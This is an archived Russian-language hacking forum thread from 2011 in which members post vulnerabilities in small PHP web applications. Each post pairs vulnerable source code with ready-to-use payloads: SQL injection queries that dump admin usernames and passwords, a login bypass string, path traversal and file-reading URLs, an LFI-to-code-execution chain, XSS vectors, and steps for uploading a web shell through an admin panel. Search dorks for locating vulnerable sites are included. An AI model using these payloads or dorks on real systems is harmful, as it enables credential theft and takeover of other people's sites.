ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.04.2011, 09:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
MediaWiki, Эскейп-последовательности приводящие к XSS в IE
CMS MediaWiki
Уязвимая версия: 1.15.3
Из-за неправильной обработки управляющих последовательностей, создается возможность првоедения XSS в стилях CSS, при просмотре web страницы через браузер Internet Explorer.
Для использования данной уязвимости необходимо вставить последвательность "\72" в формате "" внутри тэга объявляющего URL, т.е
Эксплойт
Сообщение от None
url([
JAVASCRIPT
])
|
|
|
|
12.04.2011, 10:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
Email Management Software || Скрипт для создания электронного почтового сервиса
Название скрипта: one_mail
Сайт автора:
Код:
Code:
http://www.everyone.net/index.html
Описание уязвимостей:
Множесвенные XSS уявзвимости вида ">[XSS]
Адрес уязвимой страницы:
Код:
Code:
http://localhost/email/scripts/collectRegistrationInfo.pl
|
|
|
|
18.04.2011, 00:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
2301
Репутация:
10
|
|
Muzica Free Version 1 SQL Injection:
- Download
- melodie.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$id_melodie[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'melodie'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id_categorie, nume_melodie, vizualizari_melodie, data_melodie, text_melodie, download_melodie FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nume_baza[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".melodie WHERE id_melodie ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_melodie[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
- http://localhost/melodie.php?melodie=1 union select 1,2,3,4,5,6
|
|
|
|
07.05.2011, 04:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
230 CMS
230 CMS
1. SQLi ( права админа)
File: /include/edit/edit.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"articles WHERE pagename = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pagename'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND id = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
PoC: POST pagename=1&id=1'+union+select+1,concat_ws(0x3a,use rname,password),3,4,5+from+230_users--+
2. SQLi в INSERT ( права админа)
File: /include/edit/create.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strip_tags[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"articles (`id`, `pagename`, `text`, `summary`, `name`) VALUES ('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$summary[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Уязвимое поле: $_POST['id']
|
|
|
07.05.2011, 19:33
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Web Doors CMS
1. SQLi
File: /sys/visit_logger.php
mq = off
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$log_referrer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$checkPage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT lvp_id FROM[/COLOR][COLOR="#0000BB"]$logPagesTbl[/COLOR][COLOR="#DD0000"]WHERE lvp_page LIKE '[/COLOR][COLOR="#0000BB"]$log_page[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
PoC:
Код:
Code:
GET /index.php
Referer: http://blabla.com' or substring(version(),1,1)=5-- 1
2. Список файлов в директории
File: /sys/files/file_manager.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$f_way[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$f_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$f_way[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];
...........................
[/COLOR][COLOR="#0000BB"]$f_dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]opendir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f_path[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
PoC: http://localhost/sys/files/file_manager.php?path=../.. |
|
|
|
07.05.2011, 22:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
3598
Репутация:
10
|
|
LamaCMS SQLi
Need: магия off, аккаунт юзера
./modules/pages/add1.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]'Add Page'[/COLOR][COLOR="#007700"];
if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'textfield'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$author[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO pages (title,content,author) VALUES ('[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$author[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'Your page has been added.'[/COLOR][COLOR="#007700"];
}
else
{
echo[/COLOR][COLOR="#DD0000"]'Not all fields are filled in correctly. Try again.'[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
Example:
Код:
Code:
http://localhost/lamacms/index1.php?inav=pages&modapp=add
Title: ololo', (select concat_ws(0x3a,username,password)as krasnoenebo from users limit 0,1), 'redsky')-- -
Либо напрямую шлем пост-запрос.
Идем смотреть пагу, в контенте будет вывод.
Authorization bypass
Need: магия в оффе
./index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]switch (@[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#FF8000"]//Case1: login form submitted
[/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]"login"[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM users WHERE username='[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#DD0000"]' AND password = md5('[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
while ([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$membertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'membertype'[/COLOR][COLOR="#007700"]];
}
[/COLOR][/COLOR]
Example:
Код:
Code:
login: a'or(1)#
password: =(
Также при добавлении и редактировании чего-либо имеются скули, но смысла в их выкладывании не вижу, т.к. имеются теже зависимости, что и в предыдущих багах. |
|
|
|
08.05.2011, 03:55
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
TuoCMS
1. PHP Code Execution + LFI
File: /inc/mod-rfi.inc.php
Need: rg = on
PHP код:
PHP:
[COLOR="#000000"]$pos1 = strpos($pagina, "tp://");
$pos2 = strpos($pagina, "tps://");
if (($pos1 === false) && ($pos2 === false)) {
} else {
..............................
if (!file_exists($ifile)) {
$string = "[COLOR="#0000BB"][/COLOR]\n";
$llog = fopen($ifile,"w+");
$string = fwrite($llog, $string);
fputs($llog,"# $subject\n $body\n");
fclose($llog);
}else{
$llog = fopen ($ifile,"a+");
fputs($llog,"# $subject\n $body\n");
fclose($llog);
}
[/COLOR]
Посмотрев на код видно, что если передавать существующий файл, то в файл впишется верху и это нам все обломает. Поэтому мы будем записывать в конец уже имеющегося файла.
PoC:
1) http://localhost/inc/mod-rfi.inc.php?pagina=http://&ifile=../config.dat.php
2) http://localhost/index.php?pagina=config.dat.php&cmd=phpinfo(); |
|
|
|
01.06.2011, 23:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
заливаем шелл в 4images
протестировал в версии 1.7.7
нужны админские права.
заходим в админку, Общие настройки->установки
Разрешенные типы файлов для закачки--> добавляем расширение php, сохраняем, идем в раздел Фотографии
-->Добавить фотографию
выбераем наш шелл, включаем тампер дату и меняем mime на image/jpeg (для примера)
шелл будет где то здесь
http://www.site.com/4images/data/media/1/shell.php
вместо папки 1, может быть другой номер, смотря какой альбом выбрали
|
|
|
|
06.06.2011, 14:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Sharelor File Sender 2.0
Скачать
SQL Injection:
/admin/email_config.php
Need: admin account; mg=off
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email_id'[/COLOR][COLOR="#007700"]]){
[/COLOR][COLOR="#0000BB"]$strSql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DB_TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"template_emails where email_id = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email_id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rsEdit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$strSql[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://test1.ru/admin/email_config.php?email_id=-1000' union select 1,concat_ws(0x3a,admin_login,admin_password),3,4 from xl_site_config
SQL Injection:
/view.php
Need:mg=off
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$strSql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DB_TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"files where `key` = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'key'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://test1.ru/view.php?key=-1' union select 1,2,3,4,5,concat_ws(0x3a,admin_login,admin_password),7,8,9,0,1,2 from xl_site_config
Дорк: intext:"Sharelor.com. All Rights Reserved."
|
|
|
|
06.06.2011, 14:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
RapidSendit Clone 1.0
Скачать
Читалка:
download.php
Need: admin account; mg=off
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$rand2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]];
}
...
if ([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"./storagedata/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rand2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".txt"[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$fh1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"./storagedata/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rand2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".txt"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$foundfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'|'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh1[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh1[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://test1.ru/download.php?file=../password.txt%00
Дорк: intext:"Powered By: Rapidsendit Clone V.1.0"
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [RedSky]](/avatars/avatar.jpg?2668422){kind=avatar}
Линейный вид
